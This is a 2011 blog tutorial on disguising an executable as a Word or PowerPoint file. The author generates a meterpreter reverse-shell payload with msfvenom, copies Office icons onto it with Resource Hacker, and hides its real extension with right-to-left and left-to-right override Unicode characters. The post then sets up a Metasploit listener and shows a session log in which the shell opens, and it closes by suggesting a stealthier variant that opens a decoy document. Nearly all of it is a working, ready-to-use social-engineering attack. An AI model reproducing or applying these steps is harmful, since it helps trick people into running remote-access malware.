Monday, October 24, 2011

Social engineering with unicode filenames

There have been several reports on special unicode characters being used to hide the real extension of a file - most times to make an execute file look like a document or a picture file, tricking the user into starting the executable.

Although the attack is not new, I could not find much information about good ways to create such files - so here is how I created a meterpreter payload and made it look like a normal file on Windows Vista/7.
During the process, I accessed the files both from Linux (metasploit, ruby) and Windows (Resource Hacker) using a Virtual Box machine with a shared folder. It should be possible to do everything on Windows only, but I did not test it.

[update 2011-11-04]
I just tested the examples with Windows 7 + Ruby 1.9.2. As a reader reported in the comments, the original examples do not work. Ruby 1.9.2 has improved unicode support, so we can use the \uXXXX codes directly - I added an alternative version of the commands.
[/update]

First, create a payload:

./msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -f exe LHOST=192.168.1.1 LPORT=4444 >/tmp/demo.exe


To make the file look like our target format, we need to give the executable file an icon. Copy demo.exe to demo_doc.exe and demo_ppt.exe to create a Word and a Powerpoint template.

Now we need to find the correct icons for these filetypes. Start Resource Hacker (http://www.angusj.com/resourcehacker/) and open the Word executable holding the icons ("c:\program files\microsoft office\office14\wordicon.exe" on my system). Find a suitable icon group and note the corresponding values (resource name = 201 and language = 1033 in my case). Resource Hacker showed some error messages on my system, but it worked nonetheless.



Now open your payload (demo_doc.exe) file in Resource Hacker. Click "Action -> Add a new Resource".  Open the file holding the icon (wordicon.exe in my case), set resource type to "ICON" and enter the collected values.
If you use an executable that already has an icon (e.g. when executing msfvenom with calc.exe as a template), use "Action -> Replace Icon".



Click "Add Resource" and save the file.

Repeat the process for the Powerpoint file. I used the file powerpnt.exe, resource name = 1301, language = 1033.

This is what you should see in Windows Explorer:







Theoretically, you could first rename the files before editing the icon resources. However, in my tests Resource hacker did not work correctly with the unicode filenames, so I recommend doing it in the described order.

The most used character for these tricks is "right-to-left override" (RTLO), in unicode: U+202E.
First, we need to convert this into an UTF-8 representation. You can do this by hand, like described here: http://home.tiscali.nl/t876506/utf8tbl.html, or you can just look it up: http://www.fileformat.info/info/unicode/char/202e/index.htm

So, U+202E converts to 0xE280AE.
With a simple RTLO, we can reverse the right side of the filename, so "cod.exe" looks like "exe.doc". We are quite limited here, as the name of the file needs to end on exe.

One good example I found was a file displayed as "SexyAlexe.ppt". The real name of this file is "SexyAl\xe2\x80\xaetpp.exe".

I used ruby to execute the rename commands, as the special characters sometimes cause problems if you try to execute them in a normal shell.

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\u202Etpp.exe")'


In Windows Explorer:




For more advanced file names, we need a second unicode character: U+202D = 0xE280AD, this one is called left-to-right override (LTRO).

Using this, the real file extension of the file can be placed anywhere in the displayed filename. We now also use .scr as extension to have more options.

# [RTLO]cod.yrammus_evituc[LTRO]2011.exe

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_doc.exe", "\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_doc.exe", "\u202Ecod.yrammus_evituc\u202D2011.exe")'


# [RTLO]tpp.stohsnee[LTRO]funny.scr

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "\xe2\x80\xaetpp.stohsnee\xe2\x80\xadfunny.scr")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "\u202Etpp.stohsnee\u202Dfunny.scr")'

The filename is created in two parts, first writing from right to left and then from left to right, prepending the characters left of all those already written.

Result:






Open a metasploit console on the attacking machine:

./msfconsole
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.1
msf  exploit(handler) > exploit
Now, open one of the created files on the target machine and you should get a meterpreter shell:
[*] Started reverse handler on 192.168.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.100:54354) at Sun Oct 23 19:42:30 +0200 2011
Of course, no document will be opened and some users might get suspicious. An advanced version of this attack would use an executable file that extracts an embedded document, opens it and then executes the reverse shell.